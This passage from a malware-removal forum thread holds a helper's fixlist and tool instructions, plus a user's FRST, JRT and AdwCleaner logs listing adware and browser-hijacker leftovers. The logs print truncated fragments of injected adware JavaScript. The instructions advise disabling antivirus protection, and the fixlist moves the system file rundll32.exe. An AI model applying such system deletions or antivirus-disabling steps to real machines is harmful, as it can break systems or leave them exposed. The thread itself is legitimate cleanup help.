    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
    
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
    
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
    
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.sweet-pag...F1A80P6304P6304
    
    SearchScopes: HKLM - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    SearchScopes: HKLM - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    SearchScopes: HKLM-x32 - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    SearchScopes: HKLM-x32 - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
    
    BHO: No Name -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.x64.dll No File
    
    BHO: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll No File
    
    BHO-x32: UTubErAdBllockEr -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.dll No File
    
    BHO-x32: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.dll No File
    
    BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    
    Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
    
    Handler-x32: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
    
    Filter: text/xml - {807553E5-5146-11D5-A672-00B0D022E945} -  No File
    
    FF ProfilePath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
    
    FF NewTab: hxxp://www.sweet-page.com/newtab/?type=nt&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
    
    FF DefaultSearchEngine: sweet-page
    
    FF SelectedSearchEngine: sweet-page
    
    FF Homepage: hxxp://www.sweet-page.com/?type=hp&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
    
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
    
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml
    
    FF Extension: No Name - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com [Not Found]
    
    FF StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe http://www.sweet-pag...F1A80P6304P6304
    
    S2 671c50b0; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserSystemEnahncerSvc.dll",service
    
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    
    C:\Windows\system32\rundll32.exe
    
    C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys
    
    Task: {07BB6D31-E1B4-4CAC-A67B-922398F9EEB3} - \UpdaterEX No Task File <==== ATTENTION
    
    Task: {B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6} - \PC Performer No Task File <==== ATTENTION
    
    EmptyTemp:
    
    end
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

 

 

JRTbythisisu.png Fix with Junkware Removal Tool
 
Please download JRT by Thisisu and save the file to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.
 
  • Right-click on JRTbythisisu.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Follow the prompts and let this process run uninterrupted.
  • This scan can take a while, depending on your System specs.
  • Upon completion, a log (JRT.txt) will open on your desktop.
 
Please include the contents of that file in your reply.
 
Do not forget to re-enable your previously switched off protection software!
Please also manually reboot your machine after this procedure.
 
adwcleaner_new.png Scan with AdwCleaner
 
Please download AdwCleaner by Xplode and save the file to your desktop.
 
  • Right-click on adwcleaner_new.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Follow the prompts and click Scan.
  • Upon completion, click Report. A log (AdwCleaner[R*].txt) will open.
 
Please include the contents of that file in your reply.

 

51a612a8b27e2-Zoek.png Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one)
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.



  • Right-click on 51a612a8b27e2-Zoek.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Wait patiently until the main console will appear, it may take a minute or two.
  • In the main box please paste in the following script:
    createsrpoint;
    
    process;
    
    services-list;
    
    systemspecs;
    
    startupall;
    
    skipfix-iedefaults;
    
    firefoxlook;
    
    chromelook;
    
    filesrcm;
    
    installedprogs;
  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Post its content into your next reply.

 

 

If you need to Reset IE and FF.

 

These instructions might not be exactly correct for your versions of IE and FF, but it should get you close enough so that you can figure out the rest.

How to Reset Firefox, click here.

How to Reset Internet Explorer, click here.

 


  • 0

#6
awesomesauce

awesomesauce

    Member

  • Topic Starter
  • Member
  • PipPip
  • 21 posts

Hi,

 

Thank you for your detailed response. It is very much appreciated.

 

I had a feeling it was messy in FF and IE. Part of the reason I exclusively use Chrome these days (plus I just prefer it as a browser).

 

However the original problem I described is in Chrome. I still closely followed your instructions because I think it's good to get everything cleaned, but I hope it will also fix the Chrome issue.

 

Here are the outcomes/logs:

 

- I have completely uninstalled BitComet.

 

- FRST Fix Log:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 15-10-2014 02
Ran by Mitey Fresh at 2014-10-16 12:32:53 Run:1
Running from C:\Users\Mitey Fresh\Desktop
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
 
AppInit_DLLs: C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL => C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL File Not Found
 
AppInit_DLLs-x32: c:\progra~3\fastan~1\fastan~1.dll => "c:\progra~3\fastan~1\fastan~1.dll" File Not Found
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x6E8195E10142CE01
 
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
 
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
 
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
 
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.sweet-pag...F1A80P6304P6304
 
SearchScopes: HKLM - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
 
SearchScopes: HKLM - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
 
SearchScopes: HKLM-x32 - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
 
SearchScopes: HKLM-x32 - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
 
BHO: No Name -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.x64.dll No File
 
BHO: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll No File
 
BHO-x32: UTubErAdBllockEr -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.dll No File
 
BHO-x32: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.dll No File
 
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
 
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
 
Handler-x32: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
 
Filter: text/xml - {807553E5-5146-11D5-A672-00B0D022E945} -  No File
 
FF ProfilePath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
 
FF NewTab: hxxp://www.sweet-page.com/newtab/?type=nt&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
 
FF DefaultSearchEngine: sweet-page
 
FF SelectedSearchEngine: sweet-page
 
FF Homepage: hxxp://www.sweet-page.com/?type=hp&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
 
FF Plugin: @microsoft.com/GENUINE -> disabled No File
 
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
 
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml
 
FF Extension: No Name - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com [Not Found]
 
FF StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe http://www.sweet-pag...F1A80P6304P6304
 
S2 671c50b0; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserSystemEnahncerSvc.dll",service
 
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
 
C:\Windows\system32\rundll32.exe
 
C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys
 
Task: {07BB6D31-E1B4-4CAC-A67B-922398F9EEB3} - \UpdaterEX No Task File <==== ATTENTION
 
Task: {B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6} - \PC Performer No Task File <==== ATTENTION
 
EmptyTemp:
 
end
*****************
 
"C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL" => Value Data removed successfully.
"c:\progra~3\fastan~1\fastan~1.dll" => Value Data removed successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache => value deleted successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache_TIMESTAMP => value deleted successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => Value was restored successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key deleted successfully.
"HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKCR\CLSID\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKCR\CLSID\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{25880CCB-24B8-785F-89B4-3DDCE851F8CF}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{65716D5D-F3D7-C35B-7F16-25F69BF58395}" => Key deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKCR\PROTOCOLS\Handler\WSISVCUchrome" => Key deleted successfully.
"HKCR\Wow6432Node\PROTOCOLS\Handler\WSISVCUchrome" => Key not found.
"HKCR\PROTOCOLS\Filter\text/xml" => Key deleted successfully.
"HKCR\CLSID\{807553E5-5146-11D5-A672-00B0D022E945}" => Key not found.
 => Should not be moved.
Firefox newtab deleted successfully.
Firefox DefaultSearchEngine deleted successfully.
Firefox SelectedSearchEngine deleted successfully.
Firefox homepage deleted successfully.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml => Moved successfully.
C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com not found.
HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\\Default => Value was restored successfully.
671c50b0 => Service deleted successfully.
FairplayKD => Service deleted successfully.
C:\Windows\system32\rundll32.exe => Moved successfully.
"C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{07BB6D31-E1B4-4CAC-A67B-922398F9EEB3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07BB6D31-E1B4-4CAC-A67B-922398F9EEB3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdaterEX" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PC Performer" => Key deleted successfully.
EmptyTemp: => Removed 4.5 GB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====
 
- JRT File:
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.14.2014:1)
OS: Windows 7 Home Premium x64
Ran by Mitey Fresh on Thu 16/10/2014 at 13:40:49.36
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\sizlsearch_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\sizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatesizlsearch_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatesizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updateWebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updateWebSpades_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\WebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\WebSpades_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\sizlsearch_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\sizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updatesizlsearch_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updatesizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updateWebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updateWebSpades_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\WebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\WebSpades_RASMANCS
 
 
 
~~~ Files
 
Successfully deleted: [File] "C:\Users\Mitey Fresh\appdata\local\google\chrome\user data\default\local storage\http_adultcatfinder.com_0.localstorage"
Successfully deleted: [File] "C:\Users\Mitey Fresh\appdata\local\google\chrome\user data\default\local storage\http_www.azlyrics.com_0.localstorage"
Successfully deleted: [File] "C:\Users\Mitey Fresh\appdata\local\google\chrome\user data\default\local storage\http_www.lyricsmode.com_0.localstorage"
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
Successfully disinfected: [Shortcut] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\microsoft\windows\start menu\Programs\Internet Explorer.lnk
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\microsoft\windows\start menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
 
 
 
~~~ Folders
 
Successfully deleted: [Folder] C:\ProgramData\AApptoU
Successfully deleted: [Folder] C:\ProgramData\grEatisaavIng
Successfully deleted: [Folder] C:\ProgramData\Saveitkeep
Successfully deleted: [Folder] "C:\ProgramData\browse~2"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\AppData\Roaming\performersoft"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\AppData\Roaming\suptab"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\appdata\local\globalupdate"
Successfully deleted: [Folder] "C:\Program Files (x86)\ss.helper"
Successfully deleted: [Folder] "C:\Program Files (x86)\sweetpacks bundle uninstaller"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\documents\optimizer pro"
 
 
 
~~~ FireFox
 
Successfully deleted: [Folder] C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\extensions\[email protected]
Successfully deleted: [Folder] C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\extensions\staged
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions\\[email protected]l.com
Successfully deleted the following from C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\prefs.js
 
user_pref("extensions.nWpQCpk6wsS.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apa
user_pref("extensions.ocqQ4lEIHr3.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apa
Emptied folder: C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\minidumps [1 files]
 
 
 
~~~ Event Viewer Logs were cleared
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 16/10/2014 at 13:45:42.00
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
- AdwCleaner R[1]
 
# AdwCleaner v4.000 - Report created 16/10/2014 at 14:04:51
# Updated 12/10/2014 by Xplode
# Database : 2014-10-15.7
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Mitey Fresh - KIRRA-PC
# Running from : C:\Users\Mitey Fresh\Desktop\AdwCleaner (1).exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Found : C:\END
Folder Found : C:\ProgramData\NetoCaoUoppOn
Folder Found : C:\ProgramData\tperfecctcoupon
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected]
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
 
***** [ Scheduled Tasks ] *****
 
Task Found : Optimizer Pro Schedule
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Found : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\Conduit
Key Found : HKCU\Software\GlobalUpdate
Key Found : HKCU\Software\IM
Key Found : HKCU\Software\InstallCore
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.superfish.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\easylifeapp.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.superfish.com
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5F67A827-B751-FAFB-64EE-A591954230F3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B911B39E-2966-E45D-A3F7-6770B23FFF1E}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DCC2D8A0-C2D2-D985-8F2E-77B4D5E94961}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5F67A827-B751-FAFB-64EE-A591954230F3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B911B39E-2966-E45D-A3F7-6770B23FFF1E}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DCC2D8A0-C2D2-D985-8F2E-77B4D5E94961}
Key Found : HKCU\Software\Optimizer Pro
Key Found : HKCU\Software\PerformerSoft
Key Found : HKCU\Software\powerpack
Key Found : HKCU\Software\SweetIM
Key Found : [x64] HKCU\Software\Conduit
Key Found : [x64] HKCU\Software\GlobalUpdate
Key Found : [x64] HKCU\Software\IM
Key Found : [x64] HKCU\Software\InstallCore
Key Found : [x64] HKCU\Software\Optimizer Pro
Key Found : [x64] HKCU\Software\PerformerSoft
Key Found : [x64] HKCU\Software\powerpack
Key Found : [x64] HKCU\Software\SweetIM
Key Found : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Found : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Found : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1663C10B-0D55-438D-8496-19A3DBAEC0E4}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{21BE4A39-F3B8-3881-C165-D5BE1940B6B7}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{2DA20882-8FB0-D5E8-5011-211AB37CDD60}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{310E5046-DDEA-D525-42B1-DA9430AD2C95}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3ABEFC4D-4491-1AC7-104D-00E2082F944C}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{59C3F0EF-049A-7029-B7D7-8F8521875358}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5F67A827-B751-FAFB-64EE-A591954230F3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B911B39E-2966-E45D-A3F7-6770B23FFF1E}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{C575E9F8-8CCE-8ADA-F592-97D27D617CF5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{DCC2D8A0-C2D2-D985-8F2E-77B4D5E94961}
Key Found : HKLM\SOFTWARE\Classes\DigiCoupon.DigiCoupon
Key Found : HKLM\SOFTWARE\Classes\DigiCoupon.DigiCoupon.5.3
Key Found : HKLM\SOFTWARE\Classes\ExstraaCCouPon.ExstraaCCouPon
Key Found : HKLM\SOFTWARE\Classes\ExstraaCCouPon.ExstraaCCouPon.4.3
